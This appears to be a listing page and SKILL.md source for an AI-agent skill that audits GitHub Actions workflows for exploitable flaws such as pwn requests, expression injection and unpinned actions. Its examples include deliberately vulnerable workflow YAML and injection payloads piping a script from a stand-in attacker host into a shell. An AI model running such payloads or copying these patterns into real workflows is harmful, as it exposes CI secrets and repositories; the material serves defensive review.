gha-security-review
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
About this skill
The `gha-security-review` skill directs AI agents to examine GitHub Actions workflows for exploitable security vulnerabilities. Unlike generic CI/CD security tools, it targets real-world attack patterns and exploitation vectors drawn from actual GitHub Actions compromises, such as those analyzed in StepSecurity's write-up of the HackerBot Claw campaign. Its core principle: every reported vulnerability must be accompanied by a concrete, actionable exploitation scenario. This keeps findings practical and immediately useful for developers and security teams, ruling out speculative reports and focusing on verifiable threats in the workflow logic.
Best use case
Conducting proactive security audits of GitHub Actions workflows; identifying potential supply chain attack vectors; hardening CI/CD pipelines against known exploits; educating developers on secure GitHub Actions practices; and ensuring compliance with security best practices for automated build and deployment processes.
A detailed report outlining identified security vulnerabilities within the specified GitHub Actions workflows. Each finding will include a clear description of the vulnerability, its potential impact, and a concrete, step-by-step exploitation scenario demonstrating how an attacker could leverage it. The output will be focused exclusively on GHA-specific attack patterns, enabling informed decisions for remediation.
Practical example
Example input
{"workflow_content": "name: CI\non:\n pull_request:\n types: [opened, synchronize, reopened]\n workflow_dispatch:\n\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v2 # Potentially vulnerable old version\n - name: Echo PR title\n run: echo \"PR title: ${{ github.event.pull_request.title }}\"\n - name: Dangerous command\n if: ${{ github.event_name == 'pull_request' }}\n run: |-\n echo \"Running custom script with ${{ github.event.pull_request.head.sha }}\"\n # Example of a potentially risky command if input is not sanitized or trusted\n eval \"echo Hello ${{ github.event.pull_request.title }}\"\n"}
Example output
{"findings": [{"vulnerability": "Outdated actions/checkout version", "description": "The workflow uses `actions/checkout@v2`, which is known to have vulnerabilities. For example, some older versions could be vulnerable to repository metadata injection or expose secrets when processing untrusted input from fork pull requests.", "impact": "Could allow an attacker to inject malicious code into the workflow, potentially gaining access to GITHUB_TOKEN or other secrets, or manipulating the build process.", "exploitation_scenario": "1. An attacker forks the repository and creates a malicious branch.\n2. In their forked repository, they can craft a specific commit or pull request title that exploits a known vulnerability in `actions/checkout@v2` (e.g., manipulating git metadata).\n3. When the PR from the fork is opened, the workflow runs using the vulnerable `checkout@v2`, executing the malicious payload within the context of the workflow, potentially exfiltrating secrets or injecting malicious artifacts."}, {"vulnerability": "Command Injection via `eval` with unsanitized PR title", "description": "The workflow directly uses `eval` on `github.event.pull_request.title` without proper sanitization or escaping. If a pull request from an untrusted source is opened, the PR title can contain malicious shell commands.", "impact": "Arbitrary code execution within the context of the workflow, allowing an attacker to access environment variables, secrets, modify files, or trigger other actions.", "exploitation_scenario": "1. An attacker forks the repository and creates a new branch.\n2. They create a pull request with a specially crafted title, e.g., `My PR Title $(evil_command_here) #`.\n3. When the workflow runs the `Dangerous command` step, `eval` will execute `echo Hello My PR Title $(evil_command_here) #`. The `$()` syntax will cause `evil_command_here` to execute.\n4. `evil_command_here` could be `curl http://attacker.com/evil.sh | bash` to download and execute arbitrary scripts, or `echo \"GITHUB_TOKEN: $GITHUB_TOKEN\"` to exfiltrate secrets."}], "summary": "2 potential security vulnerabilities identified in the GitHub Actions workflow. Immediate review and remediation are recommended."}
When to use this skill
- Before deploying new GitHub Actions workflows to production; periodically reviewing existing workflows for newly discovered attack patterns; integrating new third-party actions or complex scripts into your CI/CD pipeline; performing a security audit of your repository's automated processes; or when a security incident or breach related to CI/CD has occurred and you need to identify similar vulnerabilities.
When not to use this skill
- When the focus is on general application code security (e.g., SAST/DAST for application logic) rather than GitHub Actions specific vulnerabilities; for CI/CD platforms other than GitHub Actions; if you need to automatically remediate or fix vulnerabilities (this skill only identifies and provides exploitation scenarios); or when the security of GitHub Actions workflows is not a concern for your project.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in `.claude/skills/gha-security-review/SKILL.md` inside your project
- Restart your AI agent — it will auto-discover the skill
How gha-security-review Compares
| Feature / Agent | gha-security-review | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Easy | N/A |
Frequently Asked Questions
What does this skill do?
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as easy. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
<!--
Attack patterns and real-world examples sourced from the HackerBot Claw campaign analysis
by StepSecurity (2025): https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation
-->
# GitHub Actions Security Review
Find exploitable vulnerabilities in GitHub Actions workflows. Every finding MUST include a concrete exploitation scenario — if you can't build the attack, don't report it.
This skill encodes attack patterns from real GitHub Actions exploits — not generic CI/CD theory.
## When to Use
- You are reviewing GitHub Actions workflows for exploitable security issues.
- The task requires tracing a concrete attack path from an external attacker to workflow execution or secret exposure.
- You need a security review of workflow files, composite actions, or workflow-related scripts with evidence-based findings only.
## Scope
Review the workflows provided (file, diff, or repo). Research the codebase as needed to trace complete attack paths before reporting.
### Files to Review
- `.github/workflows/*.yml` — all workflow definitions
- `action.yml` / `action.yaml` — composite actions in the repo
- `.github/actions/*/action.yml` — local reusable actions
- Config files loaded by workflows: `CLAUDE.md`, `AGENTS.md`, `Makefile`, shell scripts under `.github/`
### Out of Scope
- Workflows in other repositories (only note the dependency)
- GitHub App installation permissions (note if relevant)
## Threat Model
Only report vulnerabilities exploitable by an **external attacker** — someone **without** write access to the repository. The attacker can open PRs from forks, create issues, and post comments. They cannot push to the repository's branches or trigger `workflow_dispatch` or other manually dispatched workflows.
**Do not flag** vulnerabilities that require write access to exploit:
- `workflow_dispatch` input injection — requires write access to trigger
- Expression injection in `push`-only workflows on protected branches
- `workflow_call` input injection where all callers are internal
- Secrets in `workflow_dispatch`/`schedule`-only workflows
## Confidence
Report only **HIGH** and **MEDIUM** confidence findings. Do not report theoretical issues.
| Confidence | Criteria | Action |
|---|---|---|
| **HIGH** | Traced the full attack path, confirmed exploitable | Report with exploitation scenario and fix |
| **MEDIUM** | Attack path partially confirmed, uncertain link | Report as needs verification |
| **LOW** | Theoretical or mitigated elsewhere | Do not report |
For each HIGH finding, provide all five elements:
1. **Entry point** — How does the attacker get in? (fork PR, issue comment, branch name, etc.)
2. **Payload** — What does the attacker send? (actual code/YAML/input)
3. **Execution mechanism** — How does the payload run? (expression expansion, checkout + script, etc.)
4. **Impact** — What does the attacker gain? (token theft, code execution, repo write access)
5. **PoC sketch** — Concrete steps an attacker would follow
If you cannot construct all five, report as MEDIUM (needs verification).
---
## Step 1: Classify Triggers and Load References
For each workflow, identify triggers and load the appropriate reference:
| Trigger / Pattern | Load Reference |
|---|---|
| `pull_request_target` | `references/pwn-request.md` |
| `issue_comment` with command parsing | `references/comment-triggered-commands.md` |
| `${{ }}` in `run:` blocks | `references/expression-injection.md` |
| PATs / deploy keys / elevated credentials | `references/credential-escalation.md` |
| Checkout PR code + config file loading | `references/ai-prompt-injection-via-ci.md` |
| Third-party actions (especially unpinned) | `references/supply-chain.md` |
| `permissions:` block or secrets usage | `references/permissions-and-secrets.md` |
| Self-hosted runners, cache/artifact usage | `references/runner-infrastructure.md` |
| Any confirmed finding | `references/real-world-attacks.md` |
Load references selectively — only what's relevant to the triggers found.
## Step 2: Check for Vulnerability Classes
### Check 1: Pwn Request
Does the workflow use `pull_request_target` AND check out fork code?
- Look for `actions/checkout` with `ref:` pointing to PR head
- Look for local actions (`./.github/actions/`) that would come from the fork
- Check if any `run:` step executes code from the checked-out PR
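The classic shape of this pattern, as an illustrative sketch (hypothetical workflow and secret names, not taken from any real repository):

```yaml
# VULNERABLE (sketch): pull_request_target runs in the base repository's
# context, with secrets and a write-capable GITHUB_TOKEN available.
name: privileged-ci
on: pull_request_target

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Checks out the attacker's fork head into the privileged context
          ref: ${{ github.event.pull_request.head.sha }}
      # Anything build.sh does is now attacker-controlled, with secrets in reach
      - run: ./build.sh
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
```

The trigger alone is not the bug; the combination of the privileged trigger with execution of fork-controlled code is what makes it exploitable.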
### Check 2: Expression Injection
Are `${{ }}` expressions used inside `run:` blocks in externally-triggerable workflows?
- Map every `${{ }}` expression in every `run:` step
- Confirm the value is attacker-controlled (PR title, branch name, comment body — not numeric IDs, SHAs, or repository names)
- Confirm the expression is in a `run:` block, not `if:`, `with:`, or job-level `env:`
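To make the distinction concrete, here is a minimal sketch (hypothetical step names) of the injectable pattern next to the standard environment-variable mitigation:

```yaml
# VULNERABLE (sketch): the PR title is substituted into the script text
# before the shell runs, so a title like
#   a"; curl https://attacker.example/x | sh #
# becomes part of the command itself.
- name: Echo title (injectable)
  run: echo "Title: ${{ github.event.pull_request.title }}"

# SAFE: the expression lands in an environment variable; the shell
# treats $PR_TITLE as data, never as script text.
- name: Echo title (safe)
  run: echo "Title: $PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
```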
### Check 3: Unauthorized Command Execution
Does an `issue_comment`-triggered workflow execute commands without authorization?
- Is there an `author_association` check?
- Can any GitHub user trigger the command?
- Does the command handler also use injectable expressions?
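One common authorization gate, sketched here with hypothetical job and command names, checks `author_association` before running anything:

```yaml
# Sketch: only run the command handler for comments on PRs, posted by
# users the repository trusts.
jobs:
  handle-command:
    if: >-
      github.event.issue.pull_request &&
      startsWith(github.event.comment.body, '/deploy') &&
      contains(fromJSON('["OWNER", "MEMBER", "COLLABORATOR"]'),
               github.event.comment.author_association)
    runs-on: ubuntu-latest
    steps:
      - run: echo "authorized command"
```

Note that the comment body itself must still be handled as untrusted input even after the author check passes.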
### Check 4: Credential Escalation
Are elevated credentials (PATs, deploy keys) accessible to untrusted code?
- What's the blast radius of each secret?
- Could a compromised workflow steal long-lived tokens?
### Check 5: Config File Poisoning
Does the workflow load configuration from PR-supplied files?
- AI agent instructions: `CLAUDE.md`, `AGENTS.md`, `.cursorrules`
- Build configuration: `Makefile`, shell scripts
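Even without an explicit script from the fork, config loading hands control to the PR author. A sketch (hypothetical steps):

```yaml
# Sketch: the checkout brings the fork's Makefile into the job; `make`
# then executes whatever recipes the PR author wrote, in the privileged
# job's context.
- uses: actions/checkout@v4
  with:
    ref: ${{ github.event.pull_request.head.sha }}
- run: make build
```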
### Check 6: Supply Chain
Are third-party actions securely pinned?
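As a sketch (hypothetical action name, placeholder SHA), the difference between a mutable and an immutable reference:

```yaml
# RISKY: mutable tag — the tag can be moved to malicious code after review
- uses: example-org/build-action@v1  # hypothetical action

# SAFER: pin to the full 40-character commit SHA (placeholder shown) and
# record the intended version in a comment for readability
- uses: example-org/build-action@0123456789abcdef0123456789abcdef01234567  # v1.4.2
```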
### Check 7: Permissions and Secrets
Are workflow permissions minimal? Are secrets properly scoped?
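A least-privilege sketch (illustrative job, not from the source): default the token to read-only at the workflow level and grant write scopes only to the job that needs them.

```yaml
permissions:
  contents: read  # read-only default for every job

jobs:
  comment:
    runs-on: ubuntu-latest
    permissions:
      pull-requests: write  # the only elevated scope this job needs
    steps:
      - run: gh pr comment "$PR_NUMBER" --body "CI passed"
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
```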
### Check 8: Runner Infrastructure
Are self-hosted runners, caches, or artifacts used securely?
## Safe Patterns (Do Not Flag)
Before reporting, check if the pattern is actually safe:
| Pattern | Why Safe |
|---|---|
| `pull_request_target` WITHOUT checkout of fork code | Never executes attacker code |
| `${{ github.event.pull_request.number }}` in `run:` | Numeric only — not injectable |
| `${{ github.repository }}` / `github.repository_owner` | Repo owner controls this |
| `${{ secrets.* }}` | Not an expression injection vector |
| `${{ }}` in `if:` conditions | Evaluated by Actions runtime, not shell |
| `${{ }}` in `with:` inputs | Passed as string parameters, not shell-evaluated |
| Actions pinned to full SHA | Immutable reference |
| `pull_request` trigger (not `_target`) | Runs in fork context with read-only token |
| Any expression in `workflow_dispatch`/`schedule`/`push` to protected branches | Requires write access — outside threat model |
**Key distinction:** `${{ }}` is dangerous in `run:` blocks (shell expansion) but safe in `if:`, `with:`, and `env:` at the job/step level (Actions runtime evaluation).
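A minimal sketch of that distinction:

```yaml
# Safe: evaluated by the Actions runtime — the value never reaches a shell
- if: ${{ contains(github.event.pull_request.title, 'release') }}
  run: echo "release PR"

# Dangerous: the same value is spliced into the shell script before execution
- run: echo "${{ github.event.pull_request.title }}"
```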
## Step 3: Validate Before Reporting
Before including any finding, read the actual workflow YAML and trace the complete attack path:
1. **Read the full workflow** — don't rely on grep output alone
2. **Trace the trigger** — confirm the event and check `if:` conditions that gate execution
3. **Trace the expression/checkout** — confirm it's in a `run:` block or actually references fork code
4. **Confirm attacker control** — verify the value maps to something an external attacker sets
5. **Check existing mitigations** — env var wrapping, author_association checks, restricted permissions, SHA pinning
If any link is broken, mark MEDIUM (needs verification) or drop the finding.
**If no checks produced a finding, report zero findings. Do not invent issues.**
## Step 4: Report Findings
````markdown
## GitHub Actions Security Review
### Findings
#### [GHA-001] [Title] (Severity: Critical/High/Medium)
- **Workflow**: `.github/workflows/release.yml:15`
- **Trigger**: `pull_request_target`
- **Confidence**: HIGH — confirmed through attack path tracing
- **Exploitation Scenario**:
1. [Step-by-step attack]
- **Impact**: [What attacker gains]
- **Fix**: [Code that fixes the issue]
### Needs Verification
[MEDIUM confidence items with explanation of what to verify]
### Reviewed and Cleared
[Workflows reviewed and confirmed safe]
````
If no findings: "No exploitable vulnerabilities identified. All workflows reviewed and cleared."